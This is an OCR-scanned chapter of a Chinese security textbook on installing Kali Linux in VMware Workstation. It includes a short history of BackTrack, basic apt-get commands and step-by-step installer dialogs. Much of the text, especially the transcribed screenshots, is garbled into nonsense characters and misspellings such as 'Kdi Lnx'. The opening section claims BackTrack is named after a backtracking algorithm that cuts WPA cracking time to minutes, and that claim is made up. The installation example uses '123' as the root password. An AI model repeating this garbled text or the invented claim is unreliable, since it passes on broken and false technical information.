是 基于 Ubuntu 的 自 启动 运行 光盘 .包含 了 一 套 安 全 及 计算 机 取证 工具 ,是 2012 年 为 止 
知名 度 最 高 .评价 最 好 的 关于 信息 安全 的 Linux 发 行 版 。BackTrack 是 一 套 信息 安全 审 
计 专 用 的 Linux 发 行 版 ,创造 了 一 条 可 以 方便 用 户 从 安全 工具 库 寻 找 和 更 新 安全 工具 的 
捷径 。BackTrack 可 以 翻译 为 回溯 ,因为 BackTrack 在 无 线 安全 审计 中 主要 使 用 了 
BackTrack 回溯 算法 ,比如 WEP 加 密 是 两 个 维度 ,而 WPA 加 密 相当 于 三 个 维度 ,破解 难 
度 成 几何 倍数 增长 ,而 BackTrack 算法 则 是 将 维度 降低 ,破解 难度 也 被 降低 很 多 ,过 去 需 
要 几 十 个 小 时 或 几 十 天 才能 破解 的 密码 使 用 回溯 算法 后 只 需要 几 十 分 钟 ,前 提 是 需要 有 
足够 强大 的 密码 字典 文件 。 


224 Kdi Lnx 软 件 包 的 安装 命令 及 参数 
Kali 使 用 apt-get 命令 来 安装 软件 ,这 与 RHEL 和 centos 使 用 rpm 或 yum 不同 。 前 
提 是 需要 先 配置 好 * 源 ”, 在 Kali 下 常用 的 apt-get 命令 参数 如 下 所 示 。 


apt-cache search package 搜索 包 
apt-cache show package 获取 包 的 相关 信息 ,如 说 明 ,大 小 ,版 本 等 
apt-get install package ”安装 包 
apt-get remove package 删除 包 


apt-get update 更 新 源 
atp-get upgrade 更 新 已 安装 的 包 
apt-get dist-upgrade 升级 系统 


注意 : 命令 后 面 参 数 为 短 参 数 用 “-” 引 出 ,长 参数 用 “--” 引 出 。 命 令 帮 助 信息 可 用 
man 命令 的 方式 查看 或 命令 -H(--help) 方 式 查看 ,在 man 命令 中 需要 退出 命令 帮助 请 按 
q 键 。 

例 2-1 使 用 下 列 命令 在 Kali Linux 上 安装 Flash Player。 


apt — get install flashplugin - nonfree 
update - flashplugin - nonfree — install 


例 2-2 ”使 用 下 列 命令 在 Kali Linux 上 安装 一 些 常用 工具 。 


apt - get install gnome - tweak - tool # 安装 gnome 管理 软件 


apt — get install synaptic # 安 装 新 立 德 

apt - get install file - roller # 安 装 解压 缩 软件 

apt — get install clementine # 安装 clementine 音乐 播放 器 
apt — get install smplayer # 安装 smplayer 视频 播放 器 


apt — get install terminator # 安 装 多 窗口 终端 
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2.3 方案 设计 





方案 设计 如 表 2-1 所 示 。 
表 2-1 方案 设计 


任务 名 称 黑客 操作 系统 Kali Linux 的 安装 与 设置 

1. 安装 Kali Linux 操作 系统 

(1) 安装 至 VMware Workstation 

(2) Kali Linux 操作 系统 的 安装 

(3) 安装 VMware Tools 

2. 配置 Kali Linux 软件 包 源 和 服务 

任务 分 解 (1) 配置 Kali Linux 软件 包 源 

(2) Kali Linux 操作 系统 的 更 新 与 升级 

(3) 启动 Apache 服务 

(4) 启动 Secure Shell(SSH) 服 务 

(5) 安装 并 启动 FTP 服务 

(6) 安装 中 文 输入 法 

. 能 把 Kali Linux 操作 系统 安装 至 VMware Workstation 
.能 在 Kali Linux 操作 系统 上 安装 VMware Tools 
.能 配置 Kali Linux 软件 包 源 

能 进行 Kali Linux 操作 系统 的 更 新 与 升级 

能 启动 Apache 服务 

能 启动 Secure Shell(SSH) 服 务 

能 在 Kali Linux 操作 系统 上 安装 中 文 输入 法 


了 解 什么 是 安全 渗透 

了 解 Kali Linux 的 前 世 今生 

. 了解 BackTrack 的 基本 概念 

. 熟悉 Kali Linux 软件 包 的 安装 命令 及 参数 


树立 较 强 的 安全 意识 

培养 良好 的 职业 道德 

. 掌握 网 络 安全 行业 的 基本 情况 

. 树立 较 强 的 安全 ,节约 、 环 保 意 识 

. 培养 职业 兴趣 ,具有 爱 岗 敬 业 ,热情 主动 的 工作 态度 











能 力 目标 





知识 目标 





素质 目标 





Ee 





2.4 项 目 实施 
241 任务 1: 安装 Kai Linx 操 作 系 统 


1. 任务 目标 


将 Kali Linux 操作 系统 安装 至 VMware Workstation 上 ,并 安装 VMware Tools, 实 
现 主机 与 虚拟 机 之 间 的 文件 共享 和 自动 拖 忠 功能 。 
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2. 工作 任务 


(1) 安装 至 VMware Workstation 。 
(2) Kali Linux 操作 系统 的 安装 。 
(3) 安装 VMware Tools。 

3. 工作 环境 


(1) 一 台 预 装 VMware Workstation 的 Windows 7 系统 主机 。 
(2) 软件 工具 : kali-linux-2015. 2-amd64. iso。 


4. 实施 过 程 
(1) 安装 至 VMware Workstation ,具体 操作 步骤 如 下 。 
@ 启动 VMware Workstation ,在 界面 单 击 * 创 建新 的 虚拟 机 ?图 标 ,安装 虚拟 机 的 类 


型 包括 “典型 (推荐 )” 和 ”* 自 定义 (高 级 ) "两 种 ,这 里 推荐 使 用 * 自 定义 (高 级 ) "方式 , 单 击 
“下 一 步 ” 按 钮 ,如 图 2-2 所 示 。 





欢迎 使 用 新 建 虚拟 机 向 导 


您 希望 使 用 什么 类 型 的 配置 ? 


〇 典型 (推荐 )XT) 

通过 几 个 简单 的 步骤 创建 Workstation 
10.0 虚拟 机 。 

vmware 

Workstation 图 自 证 义 (高 级 )(C) 
创建 带 有 SCSI 控制 器 类 型 、 虚 拟 磁 盘 类 
型 以 及 与 旧版 VMware 产品 兼容 性 等 高 
级 选项 的 虚拟 机 。 





< 上 一 步 (B) 取消 


图 2-2 “新 建 虚拟 机 向 导 ” 对 话 框 


@ 弹出 “选择 虚拟 机 硬件 兼容 性 ”对 话 框 ,默认 是 Workstation 10.0, 然 后 单 击 “ 下 一 
步 " 按 钮 ,如 图 2-3 所 示 。 

@ 弹出 “安装 客户 机 操作 系统 ”对 话 框 , 单 击 “ 稍 后 安装 操作 系统 ” 单 选 按钮 ,然后 单 
击 “ 下 一 步 ” 按 钮 ,如 图 2-4 所 示 。 

@ 弹出 “选择 客户 机 操作 系统 ”对 话 框 , 单 击 Linux 单 选 按钮 ,版 本 选择 “Debian 7 
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新 建 虚拟 机 向 导 必 
选择 虚拟 机 硬件 兼容 性 
该 虚拟 机 需要 何 种 硬件 功能 ? 
虚拟 机 硬件 兼容 性 
硬件 兼容 性 (H): ‘Workstation 10.0 ~ 
兼容 : ESX Server(S) 
兼容 产品 : 限制 : 
Fusion 6.0 ~ 64 GB 内 存 ^~ 
Workstation 10.0 16 个 处 理 器 
10 个 网 络 适配器 
8 TB 磁盘 大 小 
帮助 < 上 一 步 (B) 

















图 2-3 


“选择 虚拟 机 硬件 兼容 性 ”对 话 框 


新 建 虚 拟 机 向 导 





x 
安装 害 户 机 操作 系统 


虚拟 机 如 同 物理 机 ， 需 要 操作 系统 。 您 将 如 何 安装 客户 机 操作 系统 ? 
安装 来 源 : 





安装 程序 光盘 (D): 


















































〇 突 装 程序 光盘 映像 文件 (so)(M): 
C:\Program Fies (x86)\VMware\VMware Workstation\ 浏览 | 
@ 稍 后 安装 操作 系统 (5)。 
创建 的 虚拟 机 将 包含 一 个 空白 硬盘 。 
帮助 < 上 -- 步 B) 取消 
图 2-4 “安装 客户 机 操作 系统 "对话 框 


64 位 ”, 然 后 单 击 * 下 一 步 "按钮 ,如 图 2-5 所 示 ,“ 命 名 虚拟 机 ”对 话 框 如 图 2-6 所 示 。 
@ 弹出 “处 理 器 配置 ”对话 框 ,选择 处 理 器 数量 和 每 个 处 理 器 的 核心 数量 ,此 处 设置 
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新 建 虚拟 机 向 导 x 


选择 害 户 机 操作 系统 
此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 








客户 机 操作 系统 


口 其 他 (O) 


版 本 (V) 
Debian 7 64 位 ~ 























| 帮助 [< Ese) | [T=SW> ] | 取消 


图 2-5 “选择 客户 机 操作 系统 "对话 框 








新 建 虚 拟 机 向 导 X 


命名 虚拟 机 
您 要 为 此 虚拟 机 使 用 什么 名 称 ? 


虚拟 机 名 称 (V): 
kai2-64| 








位 置 (L): 
H:\vmware\kal2 


在 "编辑 ">" 首选 项 "中 可 更 改 默 认 位 置 。 











| 浏览 (R)..。 | 














< 上- 步 (B) 取消 | 











图 2-6 “命名 虚拟 机 ”对 话 框 


每 个 处 理 器 的 核心 数量 为 4, 然 后 单 击 “ 下 一 步 ” 按 钮 .如 图 2-7 所 示 。 
弹出 “此 虚拟 机 的 内 存 ” 对 话 框 ,i386 和 AMD64 架构 最 低 需要 512MB 内 存 , 为 了 使 
































新 建 虚拟 机 向 导 x 
处 理 器 配置 
为 此 虚拟 机 指定 处 理 器 数量 。 
处 理 器 - 
处 理 器 数量 (p): E 过 
每 个 处 理 器 的 核心 数量 (C): 1 二 
总 处 理 器 核心 数量 : 4 





[< -$6) | [So>] [ 





图 2-7 “处 理 器 配置 ”对话 框 
得 运行 Kali Linux 速度 够 快 ,这 里 设置 内 存 为 4096MB, 然 后 单 击 “ 下 一 步 ” 按 钮 ,如 图 2-8 

















所 示 。 
新 建 虚拟 机 向 导 
此 虚拟 机 的 内 存 
您 要 为 此 虚拟 机 使 用 多 少 内 存 ? 
指定 分 配给 此 虚拟 机 的 内 存量 。 内 存 大 小 必须 为 4 MB 的 信 数 。 
64GB 此 虚拟 机 的 内 存 (M): 4096 [S| MB 
32GB Er 
16GB a 
4 外。 。 最大 推荐 内 存 : 
2GB 12104 MB 
1GB 
512 MB < ”上 晶 推荐 内 存 : 
256 MB 512 MB 
128 MB 
64MB -” ”4 口 客户 机 操作 系统 最 低 推荐 内 存 : 
32 MB 64 MB 
16 MB 
8 MB 
4MB 
帮助 < 上 一 步 (B) | | 下 一 步 (N) > 取消 

















图 2-8 “此 虚拟 机 的 内 存 ” 对 话 框 
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@ 弹出 “网 络 类 型 "对 话 框 ,设置 网 络 连 接 方 式 为 “使 用 桥接 网 络 ”, 然 后 单 击 “ 下 一 
步 " 按 钮 ,如 图 2-9 所 示 。 





新 建 虚拟 机 向 导 X 


网 络 类 型 
要 添加 哪 类 网 络 ? 





网 络 连接 


@ 使 用 桥接 网 络 (R) 
为 客户 机 操作 系统 提供 直接 访问 外 部 以 太 网 网 络 的 权限 。 客 户 机 在 外 部 网 络 
上 必须 有 自己 的 IP 地 址 。 


O 〇 使 用 网 络 地 址 转换 (NAT)(E) 
为 客户 机 操作 系统 提供 使 用 主机 IP 地 址 访问 主机 拨号 连接 或 外 部 以 太 网 网 络 
连接 的 权限 。 

O 〇 使 用 仅 主机 模式 网 络 (H) 

将 客户 机 操作 系统 连接 到 主机 上 的 专用 虚拟 网 络 。 


O 〇 不 使 用 网 络 连接 (T) 











[< Ee) | | 








图 2-9 “网络 类 型 ”对话 杠 


@@ 弹出 “选择 I/O 控制 器 类 型 "对 话 框 ,选择 “LSI Logic(L) (推荐 )" 单 选 按 钮 ,然后 
单 击 “下 一 步 ?按钮 ,如 图 2-10 所 示 。 





新 建 虚拟 机 向 导 x 


选择 I/O 控制 器 类 型 
您 要 使 用 何 种 类 型 的 SCSI 控制 器 ? 





1/0 控制 器 类 型 
SCSI 控制 器 : BusLogic(U) ”不 适用 于 64 位 客户 机 ) 


图 LSILogc(D (推荐 ) 
OSI Logc SAS(S) 














| [ < 上 一 步 (8) | [下 一步 NJ) > 取消 











图 2-10 “选择 1/0 控制 器 类 型 ”对话 框 


























Q@ 弹出 “选择 磁盘 类 型 "对 话 框 ,选择 “SCSI(S) (推荐 )" 单 选 按 钮 ,然后 单 击 “ 下 一 步 ” 
按钮 ,如 图 2-11 所 示 。 


新 建 虚拟 机 向 导 


选择 磁盘 类 型 
您 要 创建 何 种 磁盘 ? 





虚拟 磁盘 类 型 
OI1DEQ) 

@ scsI(5) (推荐 ) 
OSATA(A) 











| < -$08) | 
图 2-11 “选择 磁盘 类 型 "对 话 框 


四 弹出 "选择 磁盘 ”对 话 框 ,选择 “创建 新 虚拟 磁盘 ” 单 选 按钮 ,然后 单 击 " 下 一 步 ” 按 
钮 ,如 图 2-12 所 示 。 




















新 建 虚拟 机 向 导 x 


选择 磁盘 
您 要 使 用 哪个 磁盘 ? 





磁盘 


@ 创建 新 虚拟 磁盘 (V) 


虚拟 磁盘 由 主机 文件 系统 上 的 一 个 或 多 个 文件 组 成 ， 客 户 机 操作 系统 会 将 其 
视 为 单个 硬盘 。 虚 拟 磁盘 可 在 一 台 主 机 上 或 多 台 主机 之 间 轻 松 复制 或 移动 。 


O 〇 使 用 现 有 虚拟 磁盘 (E) 
选择 此 选项 将 重新 使 用 之 前 配置 的 磁盘 。 


O 〇 使 用 物理 磁盘 (适用 于 高 级 用 户 )(P) 
选择 此 选项 将 为 虚拟 机 提供 直接 访问 本 地 硬盘 的 权限 。 








[帮助 | < 上 —(B) | 取消 

















图 2-12 “选择 磁盘 "对话 框 








| Co mg 和 版)] 


@@ 弹出 “指定 磁盘 容量 ”对 话 框 ,安装 Kali Linux 至 少 需 要 8GB 硬盘 可 用 空间 ,为 避 
免 磁盘 空间 不 足 , 这 里 设置 为 20GB, 然 后 单 击 " 下 一 步 ” 按 钮 ,如 图 2-13 所 示 。 





新 建 虚拟 机 向 导 


x 
指定 磁盘 容量 
磁盘 大 小 为 多 少 ? 





最 大 磁盘 大 小 (GBJ(S): oo 站 
针对 Debian 7 64 位 的 建议 大 小 : 20 GB 

















立即 分 配 所 有 磁盘 空间 (A) 


分 配 所 有 容量 可 以 提高 性 能 ， 但 要 求 所 有 物理 磁盘 空间 立即 可 用 。 如 果 不 立 
和 虚拟 磁盘 的 空间 最 初 很 小 ， 会 随 着 您 向 其 中 添加 数据 而 不 


O 〇 将 虚拟 磁盘 存储 为 单个 文件 (O) 
@ 将 虚拟 磁盘 拆 分 成 多 个 文件 (M) 
拆 分 磁盘 后 ， 可 以 更 轻松 地 在 计算 机 之 间 移 动 虚拟 机 ， 但 可 能 会 降低 大 容量 
磁盘 的 性 能 。 
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图 2-13 “指定 磁盘 容量 "对话 框 


加 弹出 “指定 磁盘 文件 ”对 话 框 ,默认 名 称 为 kali2-64. vmdk, 然 后 单 击 “ 下 一 步 ” 按 
钮 ,如 图 2-14 所 示 。 
新 建 虚拟 机 向 导 


指定 磁盘 文件 
您 要 在 何 处 存储 磁盘 文件 ? 


磁盘 文件 


将 为 每 2 GB 容量 的 虚拟 磁盘 创建 一 个 磁盘 文件 。 除 第 一 个 文件 之 外 ,每 个 文件 
的 文件 名 称 将 根据 此 处 所 提供 的 文件 名 称 自 动 生成 。 

















浏览 (R)… 




















Es) | [TSD>] 








图 2-14 “指定 磁盘 文件 "对话 框 


























| 项 目 = 黑客 操作 系统 Kali Linux 的 安装 与 设置 | 《7 


图 在 弹出 的 “已 准备 好 创建 虚拟 机 ”对 话 框 中 , 单 击 “完成 "按钮 ,如 图 2-15 所 示 。 


新 建 虚 拟 机 向 导 


已 准备 好 创建 虚拟 机 
单 击 "完成 "创建 虚拟 机 。 然 后 可 以 安装 Debian 7 64 位 。 





将 使 用 下 列 设 置 创建 虚拟 机 : 





kal2-64 
H:\vmware\kal2 
Workstation 10.0 
Deban 7 64 位 


20 GB, 拆 分 

4096 MB 

桥接 模式 (自动 ) 

CD/DVD, USB 控制 器 , 打印 机 , 声卡 











自 定义 硬件 (C)..… 





























图 2-15 “已 准备 好 创建 虚拟 机 ”对 话 框 


曙 在 VMware Workstation 窗口 中 单 击 * 编 辑 虚 拟 机 设置 ?对 话 框 ,选择 CD/DVD 
(IDE) 选 项 ,在 窗口 右 侧 选择 “使 用 ISO 映像 文件 单 选 按钮 , 单 击 * 浏 览 ?按钮 ,选择 Kali 
Linux 的 映像 文件 ,然后 单 击 “ 确 定 ” 按 钮 ,如 图 2-16 所 示 。 











虚拟 机 设置 
而 件 ”选项 
设备 摘要 设备 状态 
本 内 存 4GB 已 连接 (C) 
日 处 理 器 4 回 启 动 时 连接 (O) 
届 硬 盘 (SCSI) 20 GB 


全 CD/DVD (IDE) 。 正在 使 用 文件 H:\software\ISOWK..。 | 。 连接 
风 网络 适配器 桥接 模式 (自动 ) 


图 USB 控制 器 存在 〇 使 用 物理 驱动 器 (P): 

rs a EE 
显示 器 自动 检测 

He 使 用 ISO 映像 文件 (M): 





[Hi\software\ISOWaHinux-201 “] | RE) 






































图 2-16 “虚拟 机 设置 ”对话 框 


(2) Kali Linux 操作 系统 的 安装 ,具体 操作 如 下 所 示 。 
@ 单 击 “ 开 启 此 虚拟 机 ”命令 ,会 看 到 Kali 的 引导 界面 ,可 以 选择 图 形 界面 安装 或 者 
文本 模式 安装 ,此 处 ,选择 Graphical install( 图 形 界面 ) 安 装 , 如 图 2-17 所 示 。 








KALI 


“the uote yo ecomeltne more you are able to Tear” 


Boot nenu 


Live (and64) 
Liue (and64 failsafe) 
L (forensic modle) 
Live USB Persistence 
Live USB Encrypted Per 
Install 

Graphical install 
Install with speech synthesi 
Rduanced optiom 


(check kali.org“prst 


istence (check kali.org/prst) 


2-17 ”启动 界面 





@ 在 弹出 的 “选择 语言 "窗口 中 选择 “Chinese(Simplified)- 中 文 (简体 )” 命 令 , 然 后 单 
击 Continue 按钮 ,如 图 2-18 所 示 。 





Select a language 


Choose the language to be used for the installation process. 


default language for the installed system. 


Language 





Chinese (Simpl 
Chinese (Traditional) 。 -中文 ( 蒜 钵 ) 
Croatian 
Czech 
Danish 
Dutch 


Dzongkha 
English 
Esperanto 
Estonian 
Finnish 
French 
Galician 
Georgian 
German 


人 


Screenshot | 


-Hrvatski 

- Cestina 

- Dansk 

- Nederlands 
.En 

- English 

- Esperanto 
~- Eesti 

- Suomi 


- Francais 


- Galego 

~ jGmyme 

- Deutsch 
aa 





Go Back 


图 2-18 选择 语言 


The selected language will also be the 














@ 弹出 Select a language 对 话 框 ,选择 “是 ” 单 选 按 钮 ,然后 单 击 “ 继 续 ” 按 钮 ,如 图 2-19 


所 示 。 
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黑客 操作 系统 Kali Linux 的 安装 与 设置 





Select alanguage 
所 造 语言 的 安装 程序 器 详 不 完整 


如 果 您 执行 纯 冬 的 炭 认 安装 以 外 的 操作 ， 有 很 大 可 能 性 时 些 对 话 框 会 以 更 体 中 文 显示 ,或 者 ， 如 果 那 也 不 可 用 ， 则 会 以 英文 显示 。 


除非 您 懂得 备用 语言 ,否则 推荐 您 选择 另 一 种 语言 或 终止 安装 程序 。 
要 以 所 进 的 语言 继 绕 安 闪 呵 ? 


否 
四 员 


屏幕 玲 图 返回 继续 | 


图 2-19 确认 所 选 语言 
@ 在 弹出 的 
图 2-20 所 示 。 





择 您 的 区 域 ? 对 话 框 中 选择 “中 车 





项 ,然后 





华 续 ”按钮 ,如 


请 人 选 择 您 的 区 域 : 


进 择 的 区 域 如 被 用 于 设置 您 的 时 区 以 及 其 它 例 如 帮助 决定 系 久 区 域 。 通 常 这 应 该 为 您 所 属 住 的 国家 。 


这 是 根据 您 所 过 择 的 盘 吾 产生 的 得 列表。 如 果 没 有 列 出 您 的 区 域 ， 请 计 择 “其 他 "。 


国家 、 领 折 区 区 


新 加 
Filyother 





图 2-20 “请 选择 您 的 区 域 " 对 话 框 





| 网 络 安 全 部 署 (第 2 版 ) 








@ 在 弹出 的 “配置 键盘 ”对 话 框 中 选择 “汉语 ”选项 ,然后 单 击 “ 继 续 ” 按 钮 ,如 图 2-21 
所 示 。 
























保加利亚 语 (phonetic 布局 ) 
加 拿 大 法 语 

加 全 大 -多 三品 

加 素 罗 尼 亚 语 
pr 
克罗地亚 语 

捷克 于 

丹麦 语 

荷兰 请 

多 内 何 健 总 (Dvorak) 

不 凡生 

也 界 语 

爱沙尼亚 语 

埃 蹇 俄 比 亚 语 











| _ 屏 斑 总 图 | 


图 2-21 “配置 键盘 ”对话 框 


@@ 在 弹出 的 “配置 网 络 ” 中 设置 系统 的 主机 名 为 kali, 域 名 为 kali. test. com, 如果 当 
前 计算 机 没有 连接 到 网 络 , 也 可 以 不 用 填写 域名 ,然后 单 击 “ 继 续 ” 按 钮 ,如 图 2-22 所 示 。 

@ 在 弹出 的 “设置 用 户 和 密码 ”对 话 框 中 输入 Root 用 户 的 密码 ,比如 123, 然 后 单 击 
“继续 ”按钮 ,如 图 2-23 所 示 。 

@ 在 弹出 的 “磁盘 分 区 ”窗口 中 .选择 “使 用 整个 磁盘 "命令 ,然后 单 击 “ 继 续 ” 按 钮 , 因 
为 该 系统 中 只 有 一 块 磁盘 ,隐私 使 用 默认 磁盘 。 单 击 “ 继 续 ” 按 钮 ,分 区 方案 默认 提供 了 三 
种 ,这 里 选择 “将 所 有 文件 放 在 同一 个 分 区 中 (推荐 新 手 使 用 )”。 单 击 “ 继 续 ” 按 钮 ,接着 选 
择 “ 分 区 设 定 结 束 并 将 修改 写 和 磁盘 ”命令 。 单 击 “ 继 续 ” 按 钮 ,如 果 想 要 修改 分 区 ,可 以 选 
择 “ 撤 销 对 分 区 设置 的 修改 ”命令 .重新 分 区 。 单 击 “ 继 续 ” 按 钮 ,在 “将 改动 写 入 磁盘 吗 ?” 
对 话 框 中 选择 “是 ”, 然 后 单 击 “继续 ”按钮 ,如 图 2-24 所 示 。 

加 现在 开始 安装 系统 ,在 弹出 的 “配置 软件 包 管理 器 "对话 框 中 ,选择 “ 否 " 单 选 按 钮 ， 
不 使 用 网 络 镜像 ,并 设置 HTTP 代理 信息 , 若 不 需要 通过 HTTP 代理 来 连接 到 外 部 网 
络 , 直 接 单 击 “ 继 续 ” 按 钮 ,在 弹出 的 “选择 镜像 所 做 的 国家 ”窗口 中 选择 中国” 选项 ,然后 
单 击 “ 继 续 ” 按 钮 ,如 图 2-25 所 示 。 

@@ 在 弹出 的 “将 GRUB 安装 至 硬盘 ”对 话 框 中 选择 “是 ” 单 选 按钮 ,然后 单 击 “ 继 续 ” 
按钮 ,如 图 2-26 所 示 。 



































目 黑客 操作 系统 Kali Linux 的 安装 与 设 


se 
县 





配置 网 络 


请 输入 系统 的 主机 名 。 


主机 各: 
ka 





配 芥 网 络 


域名 是 您 的 互联 网 地 址 的 一 部 分 ， 附 加 在 主机 名 之 后 。 它 通常 是 以 .com、 
以 随意 写 一 个 .但 是 要 确保 您 所 有 计算 机 的 域名 都 是 一 样 的 。 
条 名 





kalitest.coml 


.net、.edu 或 .org 结 届 。 如 果 您 正在 设置 一 


埋 和 是 在 网 络 中 怀 示 您 的 系统 的 一 单间 。 如 果 您 不 知 通 主机 名 是 什么 ， 请 艾 问 网 络 管理 员 。 如 有 果 您 正在 设置 内 部 了 网络， 那么 可 以 陆 意 写 个 





内 部 网 络 .您 可 























图 2-22 配置 网 络 











设置 用 户 和 密码 


您 需要 为 "root” 用 户 〈 即 系 流 管理 员 帐 号 ) 设 桔 一 个 暑 吗 。 如 果 和 意 或 无 究 格 的 用 户 获得 了 root 权限 村 可 能 会 导致 灾难 性 的 结果 .因此 您 应 
斌 小 好 选择 一 个 不 容易 蘑 出 的 root 刻 码 。 记 不 应 该 是 一 个 能 在 字 绵 中 拷 得 到 的 单词 或 者 一 个 跟 您 本 人 有 紧 嘱 关系 的 词语 。 


一 个 安全 的 密码 应 该 是 由 字母 、 数 字 和 标点 符号 组 合 而 成 、 而 且 要 定期 更 新 。 








根 用 户 不 应 使 用 空 密 凤 。 如 有 果 您 林 此 留 空 ， 根 用 户 账户 会 被 蔡 用 且 系 流 的 初始 用 户 账 户 会 被 给 予 权 限 通过 “sudo” 命 舍 获 得 根 用 户 权限 。 


请 注意 ， 您 娄 不 会 看 到 所 答 入 的 密友 内 容 。 
Root 用 户 路 阿 ; 


为 了 保证 您 的 密码 正确 无 误 ， 请 至 次 柏 入 相同 的 root 密码 。 
讲 且 次 答 入 酷 池 以 验证 其 正确 性 : 


eo0 











屏 直 雪 图 ] 








图 2-23 设置 用 户 和 密码 


用 各 种 标准 方案 进 





生意 分 区 。 如 果 您 喜欢 您 也 可 以 手动 换 fF。 如 果 远 择 了 分 区 向 导 ， 精 后 您 还 是 有 机 会 检查 和 侨 改 


您 选择 便 用 分 区 向 导 对 各 个 巧 盘 进 行 分 区 .下 一 步 查 俐 问 您 轨 使 用 哪个 错 鳃 ， 


泛 








~ 使 用 牙 个 周 癌 并 配 团 LVM 
- 使 用 加 个 荆 间 并 配置 加 密 的 LVM 





| 。 尿 击 各 图 返回 








(a) 


2-24 ”磁盘 分 区 设置 
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磁盘 分 区 


注意 您 所 选择 的 磁盘 上 的 全 部 数据 都 将 会 被 捉 除 ， 但 是 您 还 有 确认 是 真 的 要 做 这 此 改动 的 机 会 。 
请 进 帮 要 分 区 的 碚 奥 





屏幕 数 图 


(b) 


磁盘 分 区 


已 选择 要 分 区 
SCSIl (0,0,0) (sda) - VMware, VMware Virtual 5: 21.5 GB 


对 此 磁盘 可 以 使 用 多 种 不 同 的 方案 进行 分 区 。 如 果 您 不 太 确 定 ， 请 选择 笔 一 方案 
分 区 方案 





(推荐 新手 使 
将 /home 放 在 单独 的 分 区 
将 /home、/var 和 /tmp 都 分 别 放 在 单独 的 分 区 


屏幕 才 图 | | x 继续 | 


(0 


图 ”2-24( 续 ) 











碰 盘 分 区 


这 是 您 月 前 已 配置 的 分 区 竺 条 点 的 综合 信息 ， 请 选择 一 个 分 区 以 不 改 其 设置 (文件 系统 ， 挂 泵 点 印 ， 或 进 择 一 块 空闲 空间 以 创建 新 分 区 ,又 
惑 选 雄 一 个 设备 以 初 冶 化 其 分 区 条 。 


分 区 向 导 

软件 RAID 设置 
了 配置 水 辑 状 管理 所 
配置 加 宦 关 

配置 iSCSI 个 


5csl (0,0,0) (sda) - 21.5 GB VMware, VMware Virtual s 
> 机 主 9 区 17.2GB 和 ext4 1/ 
> ”#5 刘 辑 分 区 4.3GB f swap swap 


揪 消 对 分 区 设置 的 修改 








屏 基 各 图 “| | 。 开 有 








给 续 


(d) 





前 分 区 


各 果 您 继续 ， 以 下 所 列 出 的 修改 内 容 将 被 写 人 磁盘 。 否 则 您 将 可 以 进行 进一步 的 手动 修改 


以 下 设备 的 分 区 可 已 被 改变 
SCSIl (0,0,0) (sda) 


以 下 分 区 将 被 格式 化 
SCSI1 (0,0,0) (sda) 设备 上 的 第 1 分 区 将 被 设置 为 ext4 
SCSI1 (0,0,0) (sda) 设备 上 的 第 5 分 区 将 被 设置 为 swap 
将 改动 写 人 磁盘 曲 ? 


) 理 
是 


屏 基 基 图 继续 
(e) 


图 2-24( 续 ) 
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安装 条 统 
图 正在 安装 系统 … 
正在 籽 数 好 丰 制 到 古训 

从 
(nD) 
图 2-24( 续 ) 

配置 软件 包 管 理 器 


网 络 镜像 可 以 用 来 补充 光盘 所 天 的 软件 ， 也 可 以 用 来 提供 较 新 版 本 的 软件 
使 用 网 绪 提 像 虽 > 


回国 
是 


国人 返回 二 寺 


图 2-25 “配置 软件 包 管理 器 ”对话 框 











将 GRUB 安装 至 硬盘 


因 上 如 果 的 兢 如 此 。 您 应 该 可 以 安全 地 查 GRUB 启动 引导 器 安装 到 第 一 硬盘 的 主 引导 记录 
MBR) 上 。 


警告 : 如 果 安 装 程序 无 法 在 您 的 计算 机 上 探 惠 到 已 存在 的 其 它 操 作 系统 .修改 主 引导 记录 动作 暂时 将 使 该 操作 条 搞 无 法 
后 得手 动 设置 GRUB 以 启动 它 。 














但 是 . 您 可 以 稍 
般 GRUB 启动 引导 器 安 装 到 广 引 年 记录 (MBR) 上 三 了 
DO 再 
加 是 
NR 
屏 胡 埠 图 返回 继续 
图 2-26 “将 GRUB 安装 至 硬盘 ”对 话 框 


@@ 在 弹出 的 “安装 启动 引导 器 的 设备 "对 话 框 中 
按钮 ,如 图 2-27 所 示 。 





中 





对 /dev/ sda 选项 ,然后 : 





将 GRUB 安装 至 硬盘 


区 需要 通过 将 GRUB 启动 引导 翘 安装 到 可 启动 设备 上 以 使 新 安装 的 系统 能 够 启动 。 通 常 的 作法 是 将 GRUB 安装 到 您 第 一 块 硬盘 的 主 引导 记录 


(MBR) 上 。 如 果 您 愿意 ， 也 可 以 将 GRUB 安装 到 驱动 器 的 其 他 地 方 ， 或 者 其 他 的 哎 动 器 上 ， 甚 至 还 可 以 安装 到 一 张 软盘 上 。 
安装 启动 引导 贿 的 设 音 


手动 输入 设备 


lev/sda 


| 屏幕 到 图 | 返回 继续 | 


图 2-27 “安装 启动 引导 器 的 设备 ”对 话 框 
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@@ 此 时 将 继续 进行 安装 ,直至 结束 安装 进程 ,如 图 2-28 所 示 。 单 击 “ 继 续 ” 按 钮 ,将 
回 到 安装 系统 过 程 ,安装 完成 后 将 会 自动 重新 启动 系统 。 


结束 安装 进程 





installation complete 


Installation is complete, so it is time to boot into your new system. Make sure to remove the 
installation media, so that you boot into the new system rather than restarting the installation. 








屏 素 各 图 加 ][ 好 张 ] 
图 2-28 “结束 安装 进程 ”对 话 框 
“输入 用 户 名 和 密码 ”的 登录 窗口 如 图 2-29 所 示 。 








图 2-29 “输入 用 户 名 和 密码 ”的 登录 窗口 


(3) 安装 VMware Tools, 实 现 主机 与 虚拟 机 之 间 的 文件 共享 和 自动 拖 忠 功能 ,鼠标 
指针 也 可 以 在 虚拟 机 与 主机 之 间 自 由 移动 ,具体 操作 如 下 所 示 。 

Oa 在 VMware Workstation 菜单 栏 中 ,选择 “虚拟 机 ”一 “安装 VMware Tools” 命 令 ， 
弹出 提示 框 , 单 击 “ 是 ”按钮 ,如 图 2-30 所 示 。 

@ 挂 载 VMware Tools 安装 程序 到 /mnt/cdrom 目录 ,执行 以 下 命令 。 


root@kali:~# mkdir /mnt/cdrom/ 井 创建 挂 载 点 
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kali2-64 - VMware Workstation 
客户 机 操作 系统 已 将 CD-ROM 门 锁定 ， 并 且 可 
能 正在 使 用 CD-ROM ， 这 可 能 会 导致 客户 机 无 法 
识别 介质 的 更 改 。 如 果 可 能 ， 请 在 断 开 连 接 之 前 
从 客户 机 内 部 弹出 CD-ROM。 


确 奖 要 断 开 连 接 并 覆盖 锁定 设置 吗 ? 
是 (Y) 否 (N) 


图 2-30 ”确定 是 否 断 开 连 接 并 覆盖 锁定 设置 





